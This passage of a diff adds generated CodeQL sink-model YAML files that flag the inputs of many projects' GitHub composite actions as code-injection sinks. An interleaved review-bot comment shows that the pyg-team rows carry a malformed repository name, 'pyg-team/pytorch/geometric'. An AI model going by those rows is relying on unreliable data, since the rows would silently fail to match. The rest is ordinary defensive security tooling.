b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oracle/graal", "*", "inputs.components", "code-injection", "generated"] + - ["oracle/graal", "*", "inputs.native-images", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml new file mode 100644 index 00000000000..bf88ed5c0a1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oracle/truffleruby", "*", "inputs.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml new file mode 100644 index 00000000000..05c2a1cfaf6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["orhun/git-cliff", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml new file mode 100644 index 00000000000..46a8fd4fb8b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oven-sh/bun", "*", "inputs.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "inputs.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml new file mode 100644 index 00000000000..32467f8c3f2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["owntracks/android", "*", "inputs.name", "code-injection", "generated"] + - ["owntracks/android", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml new file mode 100644 index 00000000000..3f4cc69ba75 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pandas-dev/pandas", "*", "inputs.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "inputs.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "inputs.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml new file mode 100644 index 00000000000..8b8ebf88b46 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pardeike/harmony", "*", "inputs.architecture", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.build_configuration", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.target_framework_array", "code-injection", "generated"] + - ["pardeike/harmony", "*", "inputs.target_framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml new file mode 100644 index 00000000000..4bc0d5f660d --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pennylaneai/pennylane", "*", "inputs.requirements_file", "code-injection", "generated"] + - ["pennylaneai/pennylane", "*", "inputs.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml new file mode 100644 index 00000000000..5f38860c86d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["phalcon/cphalcon", "*", "inputs.target-name", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.ext-path", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.pecl", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.arch", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.msvc", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.ts", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.php_version", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml new file mode 100644 index 00000000000..8b45d92a5e0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml new file mode 100644 index 00000000000..7767c649780 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["php/php-src", "*", "inputs.jitType", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.runTestsParameters", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.token", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.configurationParameters", "code-injection", "generated"] + - ["php/php-src", "*", "inputs.libmysql", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml new file mode 100644 index 00000000000..419909764b7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["phpdocumentor/phpdocumentor", "*", "inputs.passphrase", "code-injection", "generated"] + - ["phpdocumentor/phpdocumentor", "*", "inputs.secret-key", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 00000000000..6e2b5247f29 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pinecone-io/pinecone-python-client", "*", "inputs.googleapis_common_protos_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.protobuf_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.lz4_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.grpcio_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "inputs.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml new file mode 100644 index 00000000000..d012a6f2fbb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pixijs/pixijs", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml new file mode 100644 index 00000000000..aead619b40b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["posthog/posthog", "*", "inputs.group", "code-injection", "generated"] + - ["posthog/posthog", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml new file mode 100644 index 00000000000..b82360205f7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["primer/react", "*", "inputs.token", "code-injection", "generated"] + - ["primer/react", "*", "inputs.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml new file mode 100644 index 00000000000..e5fad4e5256 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["project-chip/connectedhomeip", "*", "inputs.with", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "inputs.action", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml new file mode 100644 index 00000000000..71f90682b1b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["projectnessie/nessie", "*", "inputs.job-name", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.java-version", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.job-instance", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "inputs.job-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml new file mode 100644 index 00000000000..07421b98859 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["psf/black", "*", "inputs.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml new file mode 100644 index 00000000000..81fbb3ae9e4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyca/cryptography", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml new file mode 100644 index 00000000000..9587351ce1d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyg-team/pytorch/geometric", "*", "inputs.torchvision-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "inputs.cuda-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "inputs.torch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml new file mode 100644 index 00000000000..080835504a6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python-poetry/poetry", "*", "inputs.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml new file mode 100644 index 00000000000..86ce393fbc5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python/mypy", "*", "inputs.install_project_dependencies", "code-injection", "generated"] + - ["python/mypy", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml new file mode 100644 index 00000000000..182558589d7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml 
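Review bot: In `pyg-team_pytorch_geometric.model.yml` all three sink rows are keyed on `pyg-team/pytorch/geometric`, which looks as if the generator turned every `_` of the file name into `/`; the repository is presumably `pyg-team/pytorch_geometric`. If sink models are matched against the `owner/repo` part of a `uses:` reference (the matching code is not in this hunk), these rows would never match, and the three inputs would silently stop being treated as code-injection sinks, giving a false negative rather than an error. The rows should read e.g. `- ["pyg-team/pytorch_geometric", "*", "inputs.torch-version", "code-injection", "generated"]`. The generator should split the file name only at the owner/repo boundary so that other repositories with underscores in their names are not affected in the same way.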
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quarto-dev/quarto-cli", "*", "inputs.keychain-pw", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.keychain", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.certificate-file", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.certificate-value", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.working-dir", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.bucket", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.base-url", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.files", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.binary-name", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml new file mode 100644 index 00000000000..1839670baa2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quay/clair", "*", "inputs.tag", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.repo", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.quay", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.duration", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.token", "code-injection", "generated"] + - ["quay/clair", "*", "inputs.dir", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml new file mode 100644 index 00000000000..203dabaa3b9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quickwit-oss/quickwit", "*", "inputs.target", "code-injection", "generated"] + - ["quickwit-oss/quickwit", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml new file mode 100644 index 00000000000..7247d125324 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["r-lib/actions", "*", "inputs.lockfile-create-lib", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.dependencies", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.upgrade", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.pak-version", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.profile", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.install-pandoc", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.extra-packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.needs", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.error-on", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.build_args", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.args", "code-injection", "generated"] + - ["r-lib/actions", "*", "inputs.check-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml new file mode 100644 index 00000000000..22c8a56deac --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["randombit/botan", "*", "inputs.target", "code-injection", "generated"] + - ["randombit/botan", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml new file mode 100644 index 00000000000..7476425a35f --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["raspberrypi/documentation", "*", "inputs.secondary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.destination", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.source", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.bastion_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.primary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.public_bastion_host_keys", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "inputs.private_ssh_key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml new file mode 100644 index 00000000000..3c96c1b159d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ray-project/kuberay", "*", "inputs.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml new file mode 100644 index 00000000000..da9def79964 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["readthedocs/actions", "*", "inputs.single-version", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.platform", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.message-template", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.project-language", "code-injection", "generated"] + - ["readthedocs/actions", "*", "inputs.project-slug", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml new file mode 100644 index 00000000000..80c91739684 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reflex-dev/reflex", "*", "inputs.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml new file mode 100644 index 00000000000..2121bb23710 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/renovate", "*", "inputs.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml new file mode 100644 index 00000000000..f0acc305672 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rethinkdb/rethinkdb", "*", "inputs.command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.install_command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.env_activate", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "inputs.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml new file mode 100644 index 00000000000..f099314b16e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["risc0/risc0", "*", "inputs.key", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.components", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.targets", "code-injection", "generated"] + - ["risc0/risc0", "*", "inputs.toolchain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml new file mode 100644 index 00000000000..971cd92e3cd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rocketchat/rocket.chat", "*", "inputs.build-containers", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.release", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.docker-tag", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "inputs.root-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml new file mode 100644 index 00000000000..42aba6b02dd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rook/rook", "*", "inputs.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml new file mode 100644 index 00000000000..71d71f6cb21 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/trellis", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml new file mode 100644 index 00000000000..60a29d3edf7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/debug", "*", "inputs.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml new file mode 100644 index 00000000000..84d174e5a05 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/ruby", "*", "inputs.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml new file mode 100644 index 00000000000..5cc3a3a7475 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "inputs.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml new file mode 100644 index 00000000000..cee842ae1c6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["saltstack/salt", "*", "inputs.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.save-always", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml new file mode 100644 index 00000000000..535e832c1c3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sap/sapmachine", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml new file mode 100644 index 00000000000..e1902fb488f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml 
